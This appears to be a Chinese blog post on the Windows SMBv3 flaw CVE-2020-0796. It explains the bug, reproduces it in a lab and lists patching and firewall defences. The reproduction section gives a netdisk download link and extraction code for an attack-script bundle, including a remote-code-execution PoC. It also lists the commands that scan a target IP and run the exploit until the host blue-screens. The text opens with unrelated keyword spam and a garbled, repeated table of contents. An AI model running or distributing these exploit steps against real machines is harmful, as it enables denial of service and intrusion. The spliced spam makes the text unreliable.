php网站带数据库,网站源码下载了没有管理后台,什么软件做美食视频网站,网站用户管理系统目录
前言
产生原因
影响范围
漏洞复现
复现环境
复现步骤
防御措施
总结 前言
在网络安全的战场上#xff0c;漏洞一直是攻防双方关注的焦点。CVE-2020-0796#xff0c;这个被称为 “永恒之蓝 2.0” 的漏洞#xff0c;一度引起了广泛的关注与担忧。它究竟是怎样的…目录
前言
产生原因
影响范围
漏洞复现
复现环境
复现步骤
防御措施
总结 前言
在网络安全的战场上漏洞一直是攻防双方关注的焦点。CVE-2020-0796这个被称为 “永恒之蓝 2.0” 的漏洞一度引起了广泛的关注与担忧。它究竟是怎样的一个漏洞又会对我们的系统产生怎样的威胁本文将深入探讨这个漏洞并进行漏洞复现同时为大家提供有效的防御措施。
产生原因
这个漏洞的产生主要源于 Windows 对 SMBv3 协议处理中的缺陷。当 SMBv3 协议处理某些特制的压缩数据包时存在缓冲区溢出的问题。Windows 系统在解析这些数据包时没有对数据包的长度和内容进行严格的边界检查从而导致攻击者可以精心构造恶意数据包使得系统在处理这些数据包时发生缓冲区溢出进而执行攻击者预先植入的恶意代码。
影响范围
该漏洞影响众多基于 Windows 的操作系统包括但不限于
Windows Server 2019
Windows 10 Version 1903、1909 等较新版本
微软官方也发布了相关安全公告建议用户尽快进行更新以修复此漏洞。
漏洞复现
通过网盘分享的文件永恒之蓝攻击脚本 链接: https://pan.baidu.com/s/1ZtQEMg2nBtn6VZtfg6_k1g?pwd5c6r 提取码: 5c6r --来自百度网盘超级会员v3的分享
复现环境
攻击机Kali Linux
目标机Windows 10未安装相关安全补丁
复现步骤
使用的命令
nmap -p 445 --scriptsmb-protocols 目标IP #使用Nmap对目标网络进行扫描
unzip CVE-2020-0796.zip #解压攻击压缩包
cd CVE-2020-0796 #进入到解压的文件夹
cd SMBGhost #切换到漏洞检测目录
python3 scanner.py 10.0.0.103 #使用python3脚本进行检测目标ip地址是否有此漏洞
cd ../CVE-2020-0796-PoC #切换到攻击脚本目录
python3 CVE-2020-0796.py 10.0.0.103 #使用python3进行攻击 1.上传永恒之蓝攻击脚本,并进行解压 2.解压后切换到解压后的路径中并查看文件夹下的内容 drwxrwxrwx 4 root root 4096 2024年 6月29日 CVE-2020-0796-PoC #蓝屏攻击脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日 SMBGhost #扫描脚本
drwxrwxrwx 2 root root 4096 2024年 6月29日 SMBGhost_RCE_PoC #远程控制攻击脚本3.切换进入扫描脚本文件夹使用python3运行扫描脚本扫描目标主机是否存在此漏洞 4.切换进入攻击脚本此时利用脚本进行攻击 5.此时查看目标靶机已经蓝屏
至此CVE-2020-0796漏洞复现结束。
防御措施
及时更新系统安装微软发布的安全补丁是最有效的防御手段。用户应定期检查系统更新并及时安装。
网络隔离对不同安全级别的网络进行隔离限制 SMBv3 协议的访问范围减少攻击面。
启用防火墙配置防火墙规则阻止未经授权的 SMBv3 连接请求。可以只允许特定的 IP 地址或网络段访问 SMB 服务。
总结
CVE-2020-0796“永恒之蓝 2.0” 漏洞再次给我们敲响了网络安全的警钟。了解漏洞的原理、影响范围和防御措施有助于我们更好地保护自己的系统安全。在日常运维中要养成及时更新系统、加强网络安全防护的好习惯共同营造一个安全的网络环境。
